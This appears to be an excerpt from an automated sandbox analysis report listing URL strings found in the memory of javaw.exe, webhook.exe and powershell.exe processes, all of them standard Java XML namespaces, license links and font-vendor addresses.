Source: javaw.exe, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep3
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: webhook.exe, 00000003.00000002.1464487192.0000000006700000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmsk-sk
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000005.00000003.1354265335.00000000189CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3702244002.00000000189CD000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.00000000189C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitE
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingc
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
